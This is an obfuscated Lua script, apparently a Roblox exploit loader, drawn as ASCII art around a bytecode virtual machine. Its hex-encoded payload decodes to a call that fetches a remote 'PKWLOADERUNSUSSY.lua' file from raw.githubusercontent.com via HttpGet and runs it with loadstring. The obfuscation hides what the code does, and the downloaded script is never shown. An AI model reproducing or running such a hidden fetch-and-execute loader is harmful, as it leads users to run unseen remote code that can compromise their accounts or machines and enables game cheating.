
 
                                                                                local v0=tonumber;     
                                                                        local v1=string.byte;local v2=string.char;local  
                                                                     v3=string.sub;local v4=string.gsub;local v5=string.rep;local  
                                                                 v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=     
                                                            getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;  
                                                          local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local        
                                                        function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if   
                                                      (v1(v30,2)==79) then local v70=0;while true do if (v70==0) then v19=v0(v3(v30,1,1));       
                                                    return "";end end else local v71=0;local v72;while true do if (v71==0) then v72=v2(v0(v30,16)  
                                                  );if v19 then local v97=0;local v98;while true do if (v97==1) then return v98;end if (0==v97)      
                                                  then v98=v5(v72,v19);v19=nil;v97=1;end end else return v72;end break;end end end end);local          
                                                function v20(v31,v32,v33)if v33 then local v73=(v31/(((1 + 4) -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(    
                                                v32-(878 -(282 + 595)))) + (2 -1))) ;return v73-(v73%(620 -(555 + 64))) ;else local v74=(933 -((2494 -(    
                                              1523 + 114)) + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v74 + v74))>=v74) and (928 -(193 + 21 + 713)))    
                                              or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function   
                                            v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==(1066 -(68 + 997))) then return (v37 * (1526 -(    
                                            226 + (2001 -(892 + 65))))) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 +   
                                          2 + 0 ;v35=1 + 0 ;end end end local function v23()local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do  
                                           if (v38==((3 -2) -0)) then return (v42 * (30800116 -14022900)) + (v41 * (65886 -(87 + 263))) + (v40 * ((1388 -(802 + 150  
                                          )) -(67 + 113))) + v39 ;end if (v38==0) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + ((23 -14) -5) ;v38=1 + 0 ;   
                                          end end end local function v24()local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,1 -0 ,15 + 5 ) * ((999 -(915  
                                         + 82))^((159 -69) -58))) + v43 ;local v47=v20(v44,13 + 8 ,461 -(44 + 386) );local v48=((v20(v44,1518 -(998 + 488) )==(1 -0))    
                                        and  -((420 + 768) -((2149 -(1020 + 60)) + 118))) or (2 -1) ;if (v47  --[[==============================]]==(0 -0)) then if (v46   
                                        ==0) then return v48 * (0 + 0) ;else v47=1 -0 ;v45=0 + 0 ;  --[[============================================]]end elseif (v47==((  
                                        2087 -(261 + 624)) + (2268 -(630 + 793)))) then return  --[[======================================================]]((v46==((2680 -  
                                      1889) -(368 + 423))) and (v48 * (1/(0 -0)))) or (v48  --[[==========================================================]]* NaN) ;end        
                                      return v8(v48,v47-(1041 -(10 + 8)) ) * (v45 + (v46/ --[[==============================================================]]((7 -5)^(3 + 49  
                                      )))) ;end local function v25(v49)local v50;if  not  --[[================================================================]]v49 then v49=    
                                      v23();if (v49==(0 -0)) then return "";end end v50=  --[[==================================================================]]v3(v16,v18,(   
                                      v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};  --[[==================================================================]]for v68=3 -2 ,     
                                    #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return   --[[====================================================================]]v6(v51);end    
                    local v26=v23;local function v27(...)return {...},v12("#",...);end    --[[====================================================================]]local function   
              v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local    --[[======================================================================]]v58;local v59  
            ;local v60;while true do if (v52==(1934 -(565 + 1368))) then v55=nil;v56=nil; --[[======================================================================]]v52=7 -5 ;end  
           if (v52~=0) then else v53=0;v54=nil;v52=531 -(152 + 378) ;end if (v52~=4) then --[[======================================================================]] else while    
        true do if (v53==(0 -0)) then local v94=0 -0 ;while true do if (v94==(1 -0)) then --[[======================================================================]] v53=1 + 0 ;   
        break;end if (v94==(0 + 0)) then v54=0 -0 ;v55=nil;v94=1;end end end if (v53~=(   --[[======================================================================]]1253 -(721 +   
      530))) then else local v95=1271 -(945 + 326) ;while true do if (v95==1) then v53=3; --[[======================================================================]]break;end if   
      (v95==(0 + 0)) then v58=nil;v59=nil;v95=2 -1 ;end end end if (v53==3) then v60=nil;   --[[==================================================================]]while true do    
      local v99=0 + 0 ;local v100;local v101;while true do if ((701 -(271 + 429))==v99)     --[[================================================================]]then while true    
    do if (v100~=(0 + 0)) then else v101=0;while true do if (v101==(476 -(41 + 435))) then  --[[==============================================================]]local v111=0;      
    while true do if (v111==(1002 -(938 + 63))) then v101=1;break;end if (v111~=(1500 -(1408  --[[==========================================================]]+ 92))) then else    
    if (v54~=(1128 -(936 + 189))) then else local v159=1086 -(461 + 625) ;local v160;while true --[[====================================================]] do if (v159==(1288 -(   
    993 + 295))) then v160=0;while true do if (v160==(0 + 0)) then for v167=1172 -(418 + 753) ,   --[[==============================================]]v23() do v56[v167-(1 + 0)  
     ]=v28();end return v58;end end break;end end end if (2~=v54) then else local v161=1138 -(782 +   --[[====================================]]356) ;local v162;while true    
    do if (v161~=0) then else v162=0 + 0 ;while true do if (v162==(0 + 0)) then local v163=0 + 0 ;while   --[[========================]]true do if (v163==(530 -(406 + 123)))  
     then v162=1770 -(1749 + 20) ;break;end if (v163==(1875 -(157 + 1718))) then for v174=1,v59 do local v175=0 + 0 ;local v176;local v177;local v178;local v179;while true  
   do if (v175==2) then while true do if (v176==(1323 -(1249 + 73))) then v179=nil;while true do if (v177==(1 + 0)) then if (v178==(3 -2)) then v179=v21()~=(1018 -(697 +  
   321)) ;elseif (v178==(5 -3)) then v179=v24();elseif (v178==(1148 -(466 + 679))) then v179=v25();end v60[v174]=v179;break;end if (v177~=(0 -0)) then else local v190=  
  0 -0 ;local v191;while true do if ((0 + 0)~=v190) then else v191=0;while true do if (0==v191) then local v196=0 -0 ;while true do if (v196==(0 -0)) then v178=v21();     
  v179=nil;v196=2 -1 ;end if (v196~=1) then else v191=1901 -(106 + 1794) ;break;end end end if ((1228 -(322 + 905))==v191) then v177=1 + 0 ;break;end end break;end end    
  end end break;end if (v176==0) then local v187=0;local v188;while true do if (v187~=0) then else v188=611 -(602 + 9) ;while true do if ((0 + 0)==v188) then v177=0 -0 ;  
  v178=nil;v188=1;end if (v188==(873 -(826 + 46))) then v176=1;break;end end break;end end end end break;end if (v175==(2 -1)) then v178=nil;v179=nil;v175=6 -4 ;end if (  
  v175==0) then v176=114 -(4 + 110) ;v177=nil;v175=1;end end end v58[587 -(57 + 527) ]=v21();v163=1899 -(260 + 1638) ;end end end if ((1428 -(41 + 1386))~=v162) then      
  else for v169=1,v23() do local v170=103 -(17 + 86) ;local v171;local v172;while true do if (v170==(1 + 0)) then while true do if (v171~=0) then else v172=v21();if (v20  
  (v172,1 -0 ,2 -1 )==(0 -0)) then local v181=166 -(122 + 44) ;local v182;local v183;local v184;local v185;local v186;while true do if (v181~=2) then else v186=nil;while  
   true do if ((1 -0)==v182) then local v192=0 -0 ;while true do if ((0 -0)==v192) then v185=nil;v186=nil;v192=1 + 0 ;end if (v192~=1) then else v182=1 + 1 ;break;end     
  end end if (v182==2) then while true do if ((5 -2)~=v183) then else if (v20(v185,3,68 -(30 + 35) )==1) then v186[4]=v60[v186[3 + 1 ]];end v55[v169]=v186;break;end if (  
  v183==(216 -(22 + 192))) then local v194=1257 -(1043 + 214) ;while true do if (v194==(1464 -(1404 + 59))) then v183=3;break;end if (v194==(0 -0)) then local v202=0 -0 ;   
  while true do if (1~=v202) then else v194=1213 -(323 + 889) ;break;end if (v202~=(765 -(468 + 297))) then else if (v20(v185,1,2 -1 )==(581 -(361 + 219))) then v186[322 -  
  (53 + 267) ]=v60[v186[1 + 1 ]];end if (v20(v185,415 -(15 + 398) ,984 -(18 + 964) )==(1 -0)) then v186[1 + 2 ]=v60[v186[239 -(141 + 95) ]];end v202=3 -2 ;end end end end   
  end if (v183==(2 -1)) then v186={v22(),v22(),nil,nil};if (v184==(850 -(20 + 830))) then local v199=0 + 0 ;local v200;local v201;while true do if ((127 -(116 + 10))==v199  
  ) then while true do if ((0 + 0)==v200) then v201=738 -(542 + 196) ;while true do if (v201==(0 -0)) then v186[3]=v22();v186[2 + 2 ]=v22();break;end end break;end end      
  break;end if ((0 + 0)==v199) then local v204=0 + 0 ;while true do if (v204==(0 -0)) then v200=0 -0 ;v201=nil;v204=2 -1 ;end if (v204==(1552 -(1126 + 425))) then v199=1;   
  break;end end end end elseif (v184==(406 -(118 + 287))) then v186[3]=v23();elseif (v184==(165 -(92 + 71))) then v186[3]=v23() -((1 + 1)^(62 -46)) ;elseif (v184==(1124 -(  
  118 + 1003))) then local v210=0 -0 ;while true do if (v210==(377 -(142 + 235))) then v186[13 -10 ]=v23() -((4 -2)^(4 + 12)) ;v186[3 + 1 ]=v22();break;end end end v183=    
  979 -(553 + 424) ;end if (v183==(0 -0)) then local v195=0;while true do if (v195~=1) then else v183=1;break;end if (v195==(0 -0)) then v184=v20(v172,1792 -(573 + 1217) ,  
  8 -5 );v185=v20(v172,4 + 0 ,6 + 0 );v195=1 + 0 ;end end end end break;end if (v182~=(0 + 0)) then else v183=0 + 0 ;v184=nil;v182=2 -1 ;end end break;end if (v181~=(2 -1)  
  ) then else v184=nil;v185=nil;v181=5 -3 ;end if (0~=v181) then else v182=0 -0 ;v183=nil;v181=1 -0 ;end end end break;end end break;end if (v170==(0 + 0)) then v171=0 + 0  
   ;v172=nil;v170=1;end end end v54=3 -0 ;break;end end break;end end end v111=1;end end end if ((807 -(118 + 688))==v101) then if (v54~=1) then else local v142=0;local     
  v143;local v144;while true do if (v142~=(0 -0)) then else v143=753 -(239 + 514) ;v144=nil;v142=1 + 0 ;end if ((1 + 0)==v142) then while true do if ((1329 -(797 + 532))~=  
  v143) then else v144=0 + 0 ;while true do if (v144==(1887 -(927 + 959))) then v60={};v54=1 + 1 ;break;end if (v144==(0 -0)) then local v164=0;while true do if (v164==(  
  1203 -(373 + 829))) then v144=732 -(476 + 255) ;break;end if (v164~=(1130 -(369 + 761))) then else v58={v55,v56,nil,v57};v59=v23();v164=1;end end end end break;end end  
   break;end end end if (v54==(238 -(64 + 174))) then local v145=0 -0 ;local v146;local v147;while true do if (v145~=0) then else v146=1796 -(503 + 1293) ;v147=nil;v145=  
    2 -1 ;end if ((1 + 0)==v145) then while true do if (v146==(0 -0)) then v147=336 -(144 + 192) ;while true do if (v147==(0 + 0)) then local v165=0 + 0 ;local v166;      
    while true do if (v165~=0) then else v166=216 -(42 + 174) ;while true do if (v166==(0 + 0)) then local v180=0 + 0 ;while true do if (0~=v180) then else v55={};v56={}  
    ;v180=1;end if (v180==(534 -(43 + 490))) then v166=1;break;end end end if (v166==1) then v147=1 + 0 ;break;end end break;end end end if (v147==(734 -(711 + 22)))      
    then v57={};v54=3 -2 ;break;end end break;end end break;end end end break;end end break;end end break;end if (v99==(1504 -(363 + 1141))) then v100=859 -(240 + 619) ;  
      v101=nil;v99=1 + 0 ;end end end break;end if (v53==1) then local v96=0 -0 ;while true do if (v96==0) then local v108=1580 -(1183 + 397) ;while true do if (v108==  
      1) then v96=1;break;end if (v108~=0) then else v56=nil;v57=nil;v108=1 + 0 ;end end end if (v96~=(2 -1)) then else v53=2 + 0 ;break;end end end end break;end if (  
      (2 + 0)==v52) then v57=nil;v58=nil;v52=1978 -(1913 + 62) ;end if (v52~=(2 + 1)) then else v59=nil;v60=nil;v52=10 -6 ;end end end local function v29(v61,v62,v63)   
        local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v78=v65;local v79=v66;local v80=v67;local v81=v27  
        ;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=  
        v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do local v93=0;while true do if (v93==1) then if (v91  
          <=6) then if (v91<=2) then if (v91<=0) then v88[v90[2]]=v63[v90[3]];elseif (v91==1) then local v112=v90[2];local v113,v114=v81(v88[v112](v13(v88,v112 + 1 ,  
            v90[3])));v83=(v114 + v112) -1 ;local v115=0;for v138=v112,v83 do local v139=0;while true do if (v139==0) then v115=v115 + 1 ;v88[v138]=v113[v115];break;  
              end end end else local v116=v90[2];v88[v116]=v88[v116](v13(v88,v116 + 1 ,v83));end elseif (v91<=4) then if (v91==3) then local v118=v90[2];local v119,   
                v120=v81(v88[v118](v13(v88,v118 + 1 ,v90[3])));v83=(v120 + v118) -1 ;local v121=0;for v140=v118,v83 do local v141=0;while true do if (v141==0) then    
                  v121=v121 + 1 ;v88[v140]=v119[v121];break;end end end else v88[v90[2]]=v90[3];end elseif (v91>5) then do return;end else v88[v90[2]]();end elseif  
                       (v91<=9) then if (v91<=7) then do return;end elseif (v91>8) then v88[v90[2]]();else v88[v90[2]]=v63[v90[3]];end elseif (v91<=11) then if (    
                                  v91==10) then local v126=v90[2];local v127=v88[v90[3]];v88[v126 + 1 ]=v127;v88[v126]=v127[v90[4]];else v88[v90[2]]=v90[3];end      
                                      elseif (v91>12) then local v133=0;local v134;while true do if (v133==0) then v134=v90[2];v88[v134]=v88[v134](v13(v88,v134 + 1  
                                       ,v83));break;end end else local v135=0;local v136;local v137         ;while true do if (v135==0) then v136=v90[2];v137=v88[   
                                      v90[3]];v135=1;end if (v135==1) then v88[v136 + 1 ]=v137;v88[         v136]=v137[v90[4]];break;end end end v82=v82 + 1 ;     
                                      break;end if (v93==0) then v90=v78[v82];v91=v90[1];v93=1;end          end end end;end if (v64==0) then v65=v61[1];v66=v61[2  
                                      ];v64=1;end end end return v29(v28(),{},v17)(...);end v15(                                                                   
                                                                                                                                                                   
                                                                                                                                                                   
                                                                                                                                                                 
                                                                                                                                                                 
                                                                                                                                                                 
                                                                                                                                                               
                                                                                                                                                               
                                                                                                                                                             
                                                                                                                                                             
                                                                                                                                                           
                                                                                                                                                       
                                                                                                                                                   
                                                                                                                                           
                                                                                             
                                                                                           
                                                                                         
                                                                                   


--------------------------------------------------------------------------------
"LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F776F77706B772F506B77734842452F6D61696E2F504B574C4F41444552554E53552O53592E6C756100083O00124O00013O00122O000100023O00200A00010001000300120B000300044O0001000100034O000D5O00022O00093O000100012O00073O00017O00",v9(),...);
